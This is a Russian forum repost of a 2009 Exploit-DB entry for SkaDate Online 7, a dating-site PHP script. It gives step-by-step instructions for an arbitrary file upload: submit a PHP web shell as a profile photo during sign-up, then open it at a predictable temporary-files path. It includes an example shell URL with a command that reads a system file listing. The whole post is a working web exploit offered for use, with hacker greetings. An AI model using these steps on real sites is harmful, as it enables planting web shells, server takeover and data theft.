Exploit SkaDate Online 7 - Arbitrary File Upload

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8039
Проверка EDB
  1. Пройдено
Автор
ZORLU
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2009-02-11
Код:
[~] SkaDate Dating Remote Shell Upload
[~]
[~] Script: http://www.bpowerhouse.com/demos/traveling
[~] ----------------------------------------------------------
[~] home: yildirimordulari.com   online if you wanna hel you must register to my site and ý will do help tp you  xD
[~]
[~] home: yildirimordulari.com   eger yardim istiyosan siteye uye olmalisin xD
[~]
[~] author: ZoRLu  msn: [email protected]  
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] Date:11/02/09
[~]
[~] My Best Friend: Dr.LY0N
[~] -----------------------------------------------------------


you go here : http://www.yildirim.com/demo/member/join.php

select your photo but photo must be your shell.php

after you saw this: unallowable file extension "php" but no problem

your shell here: http://www.yildirim.com/demo/$userfiles/tmp/[id].php

 
for demo:

here:  http://www.skadate.com/demo/member/join.php

shell: http://www.skadate.com/demo/$userfiles/tmp/0b3291151174726fefa04cfaf43fd2bc.php

dont forget: http://www.skadate.com/demo/$userfiles/tmp/0b3291151174726fefa04cfaf43fd2bc.php?act=ls&d=%2Fetc%2Fvdomainaliases

( sizce hack benim umrumdamI )

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & Dr.LY0N & z3h!r & HEAD_HUNTER and yildirimordulari.com all users
[~]
[~] yildirimordulari.com  &  experl.com & z0rlu.blogspot.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2009-02-11]
 
Источник
www.exploit-db.com

Похожие темы